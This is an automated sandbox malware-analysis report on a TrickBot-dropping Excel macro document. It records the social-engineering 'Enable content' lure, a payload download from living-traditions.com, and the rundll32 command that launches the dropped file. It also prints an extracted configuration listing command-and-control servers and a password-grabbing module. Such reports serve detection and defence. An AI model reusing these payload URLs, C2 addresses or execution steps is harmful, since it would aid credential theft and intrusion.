Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 446446.xls

Overview

General Information

Sample Name:446446.xls
Analysis ID:385552
MD5:1b62b4f4b16d6219dce4c6d145c5af79
SHA1:d5bc46f3043119c020ae93121195aabbf151cf75
SHA256:dd3ecdcc3a6cc81ee451f90703cc899ff43c7a05b30a6538e5f3afd73f77adb1
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 TrickBot
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Trickbot
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2056 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2564 cmdline: rundll32 ..\fdinmd.fii,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2588 cmdline: rundll32 ..\fdinmd.fii,StartW MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2604 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup

Malware Configuration

Threatname: Trickbot

{"ver": "2000028", "gtag": "rob52", "servs": ["89.250.208.42:449", "182.253.184.130:449", "31.211.85.110:443", "85.112.74.178:449", "102.68.17.97:443", "103.76.150.14:443", "96.9.77.142:443", "91.185.236.170:449", "87.76.1.81:449", "91.225.231.120:443", "62.213.14.166:443", "201.114.152.181:60304", "91.248.207.239:13871", "5.50.104.227:23468", "122.117.176.99:50289", "250.16.62.7:12037", "43.219.127.177:42389", "183.210.9.161:55813", "203.2.134.219:34188", "24.203.49.183:64402", "89.227.14.153:60566", "44.55.149.111:41730", "197.181.162.30:5798", "152.49.214.109:59125", "245.241.127.55:36657", "107.85.198.194:37398", "191.250.160.220:23460", "40.81.224.235:45065", "211.246.214.27:8638"], "autorun": ["pwgrab"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
446446.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x165db:$e1: Enable Editing
  • 0x16325:$e3: Enable editing
  • 0x163f7:$e4: Enable content

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2089168736.0000000000650000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
    00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
      00000004.00000002.2089212647.0000000000780000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.rundll32.exe.780000.2.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
          4.2.rundll32.exe.650000.0.raw.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
            4.2.rundll32.exe.780000.2.raw.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

              Sigma Overview

              No Sigma rule has matched

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmpMalware Configuration Extractor: Trickbot {"ver": "2000028", "gtag": "rob52", "servs": ["89.250.208.42:449", "182.253.184.130:449", "31.211.85.110:443", "85.112.74.178:449", "102.68.17.97:443", "103.76.150.14:443", "96.9.77.142:443", "91.185.236.170:449", "87.76.1.81:449", "91.225.231.120:443", "62.213.14.166:443", "201.114.152.181:60304", "91.248.207.239:13871", "5.50.104.227:23468", "122.117.176.99:50289", "250.16.62.7:12037", "43.219.127.177:42389", "183.210.9.161:55813", "203.2.134.219:34188", "24.203.49.183:64402", "89.227.14.153:60566", "44.55.149.111:41730", "197.181.162.30:5798", "152.49.214.109:59125", "245.241.127.55:36657", "107.85.198.194:37398", "191.250.160.220:23460", "40.81.224.235:45065", "211.246.214.27:8638"], "autorun": ["pwgrab"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

              Software Vulnerabilities:

              barindex
              Document exploit detected (drops PE files)Show sources
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 4HeVw[1].perclick.0.drJump to dropped file
              Document exploit detected (UrlDownloadToFile)Show sources
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
              Document exploit detected (process start blacklist hit)Show sources
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
              Source: global trafficDNS query: name: living-traditions.com
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 64.207.186.30:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 64.207.186.30:80
              Source: global trafficHTTP traffic detected: GET /blogs/click.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: living-traditions.comConnection: Keep-Alive
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1281B7DE.emfJump to behavior
              Source: global trafficHTTP traffic detected: GET /blogs/click.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: living-traditions.comConnection: Keep-Alive
              Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
              Source: unknownDNS traffic detected: queries for: living-traditions.com
              Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
              Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
              Source: 446446.xls, 51DE0000.0.drString found in binary or memory: http://living-traditions.com/blogs/click.php
              Source: rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
              Source: rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
              Source: rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
              Source: rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
              Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
              Source: rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
              Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
              Source: rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

              System Summary:

              barindex
              Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
              Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 14 0 Protected Vie
              Source: Screenshot number: 4Screenshot OCR: Enable content" to oerform Microsoft Office Decrvotion Core to start V Q R S IE"]' ^ Enable Edit
              Source: Document image extraction number: 2Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
              Source: Document image extraction number: 2Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
              Source: Document image extraction number: 3Screenshot OCR: Enable Content
              Source: Document image extraction number: 4Screenshot OCR: Enable Editing
              Source: Document image extraction number: 13Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
              Source: Document image extraction number: 13Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
              Found Excel 4.0 Macro with suspicious formulasShow sources
              Source: 446446.xlsInitial sample: CALL
              Source: 446446.xlsInitial sample: EXEC
              Found obfuscated Excel 4.0 MacroShow sources
              Source: 446446.xlsInitial sample: High usage of CHAR() function: 39
              Source: 446446.xlsInitial sample: High usage of CHAR() function: 26
              Office process drops PE fileShow sources
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4HeVw[1].perclickJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fdinmd.fiiJump to dropped file
              Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
              Source: 446446.xlsOLE indicator, VBA macros: true
              Source: 446446.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
              Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
              Source: classification engineClassification label: mal96.troj.expl.evad.winXLS@7/7@1/1
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC532.tmpJump to behavior
              Source: 446446.xlsOLE indicator, Workbook stream: true
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fdinmd.fii,StartW
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fdinmd.fii,StartW
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fdinmd.fii,StartW
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fdinmd.fii,StartWJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fdinmd.fii,StartWJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exeJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_007C27CB push dword ptr [edx+14h]; ret 4_2_007C282D
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_007C2720 push dword ptr [edx+14h]; ret 4_2_007C282D
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4HeVw[1].perclickJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fdinmd.fiiJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fdinmd.fiiJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4HeVw[1].perclickJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fdinmd.fiiJump to dropped file

              Boot Survival:

              barindex
              Drops PE files to the user root directoryShow sources
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fdinmd.fiiJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4HeVw[1].perclickJump to dropped file
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fdinmd.fii,StartWJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exeJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected TrickbotShow sources
              Source: Yara matchFile source: 00000004.00000002.2089168736.0000000000650000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2089212647.0000000000780000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 4.2.rundll32.exe.780000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.650000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.780000.2.raw.unpack, type: UNPACKEDPE

              Remote Access Functionality:

              barindex
              Yara detected TrickbotShow sources
              Source: Yara matchFile source: 00000004.00000002.2089168736.0000000000650000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2089212647.0000000000780000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 4.2.rundll32.exe.780000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.650000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.780000.2.raw.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsScripting21Path InterceptionProcess Injection11Masquerading121OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsExploitation for Client Execution33Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              4.2.rundll32.exe.780000.2.unpack100%AviraHEUR/AGEN.1138157Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.icra.org/vocabulary/.0%URL Reputationsafe
              http://www.icra.org/vocabulary/.0%URL Reputationsafe
              http://www.icra.org/vocabulary/.0%URL Reputationsafe
              http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
              http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
              http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
              http://living-traditions.com/blogs/click.php0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              living-traditions.com
              		64.207.186.30
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://living-traditions.com/blogs/click.phpfalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmpfalse
                  		high
                  http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpfalse
                    		high
                    http://investor.msn.comrundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpfalse
                      		high
                      http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpfalse
                        		high
                        http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpfalse
                          		high
                          http://investor.msn.com/rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpfalse
                            		high

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            64.207.186.30
                            		living-traditions.comUnited States
                            		398110GO-DADDY-COM-LLCUSfalse

                            General Information

                            Joe Sandbox Version:31.0.0 Emerald
                            Analysis ID:385552
                            Start date:12.04.2021
                            Start time:17:05:10
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 5m 20s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:446446.xls
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                            Number of analysed new started processes analysed:7
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal96.troj.expl.evad.winXLS@7/7@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 32.1% (good quality ratio 25%)
                            • Quality average: 58.1%
                            • Quality standard deviation: 41.3%
                            HCA Information:
                            • Successful, ratio: 83%
                            • Number of executed functions: 3
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .xls
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Report size getting too big, too many NtCreateFile calls found.
                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/385552/sample/446446.xls

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            17:05:41API Interceptor1x Sleep call for process: rundll32.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            GO-DADDY-COM-LLCUSdocuments-1982636004.xlsmGet hashmaliciousBrowse
                            • 107.180.50.162
                            documents-1982636004.xlsmGet hashmaliciousBrowse
                            • 107.180.50.162
                            documents-466266883.xlsmGet hashmaliciousBrowse
                            • 107.180.50.162
                            documents-466266883.xlsmGet hashmaliciousBrowse
                            • 107.180.50.162
                            Processed APR12.xlsxGet hashmaliciousBrowse
                            • 192.169.223.13
                            NdBLyH2h5d.exeGet hashmaliciousBrowse
                            • 184.168.131.241
                            4oItdZkNOZ.exeGet hashmaliciousBrowse
                            • 107.180.50.167
                            Portfolio.exeGet hashmaliciousBrowse
                            • 72.167.241.46
                            12042021493876783,xlsx.exeGet hashmaliciousBrowse
                            • 184.168.131.241
                            CIVIP-8287377.exeGet hashmaliciousBrowse
                            • 184.168.177.1
                            MT103_004758.exeGet hashmaliciousBrowse
                            • 184.168.131.241
